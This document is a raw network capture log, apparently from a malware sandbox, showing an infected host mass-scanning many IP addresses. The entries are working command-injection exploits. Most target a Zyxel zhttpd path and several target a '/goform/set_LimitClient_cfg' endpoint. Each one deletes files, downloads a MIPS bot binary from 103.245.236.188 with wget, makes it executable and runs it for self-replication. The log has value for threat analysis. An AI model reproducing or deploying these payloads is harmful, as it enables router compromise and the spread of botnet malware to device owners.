                                    Jan 13, 2024 19:02:53.646806002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9388192.168.2.134430247.211.112.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646867037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9389192.168.2.134825657.137.228.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646899939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9390192.168.2.135401847.111.169.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.646985054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9391192.168.2.134192286.151.18.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647022963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9392192.168.2.135136424.111.151.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647073030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9393192.168.2.133337273.194.126.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647128105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9394192.168.2.1351702223.65.14.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647160053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9395192.168.2.1351604216.225.12.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647236109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9396192.168.2.1343578146.82.198.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647301912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9397192.168.2.135513451.111.173.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647351980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9398192.168.2.1343600185.167.139.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647425890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9399192.168.2.1359284210.108.25.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647449970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9400192.168.2.135699618.181.88.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647516966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9401192.168.2.135710065.82.0.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647588015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9402192.168.2.1342774207.234.17.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647624016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9403192.168.2.1347212133.20.135.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647671938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9404192.168.2.1337136177.191.88.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647712946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9405192.168.2.133733851.130.24.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647744894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9406192.168.2.135988254.130.92.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647797108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9407192.168.2.134911470.245.248.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647835016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9408192.168.2.1339406153.212.246.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647922039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9409192.168.2.1346124206.8.241.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647965908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9410192.168.2.13474345.157.85.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.647995949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9411192.168.2.1336084182.128.152.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.648071051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9412192.168.2.1340350139.187.224.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.648117065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9413192.168.2.1333138160.82.127.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:53.648184061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9414192.168.2.134517627.237.142.1588080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.096492052 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:54.405975103 CET103INHTTP/1.1 404 Not Found
                                    Content-Type: text/plain
                                    Content-Length: 30
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9415192.168.2.134786079.3.216.1868080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.601983070 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9416192.168.2.134045094.122.70.1348080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.619816065 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9417192.168.2.133368049.88.99.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649046898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9418192.168.2.134504432.206.121.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649287939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9419192.168.2.1337742143.5.87.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649337053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9420192.168.2.135345448.230.117.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649403095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9421192.168.2.133717076.184.196.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649457932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9422192.168.2.13568529.130.180.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649549961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9423192.168.2.134683858.215.170.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649610996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9424192.168.2.1357618174.21.149.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649704933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9425192.168.2.1355820202.47.253.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649755955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9426192.168.2.1346950110.115.6.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649837017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9427192.168.2.133466025.137.12.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649904013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9428192.168.2.1346054199.198.157.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.649966955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9429192.168.2.135805862.230.166.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650065899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9430192.168.2.1340594126.79.240.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650125980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9431192.168.2.1345042168.136.2.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650204897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9432192.168.2.1341018145.40.137.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650268078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9433192.168.2.1351138207.32.46.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650352955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9434192.168.2.1353496160.173.193.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650445938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9435192.168.2.135924086.130.92.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650518894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9436192.168.2.1336892157.117.63.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650588989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9437192.168.2.1352540119.235.65.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650656939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9438192.168.2.1350246160.194.120.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650713921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9439192.168.2.1351028218.88.165.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650764942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9440192.168.2.135019271.174.52.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650831938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9441192.168.2.1339700213.218.96.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650908947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9442192.168.2.1336812160.250.46.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.650949001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9443192.168.2.134113863.92.248.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651005030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9444192.168.2.1334870189.134.17.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.651061058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


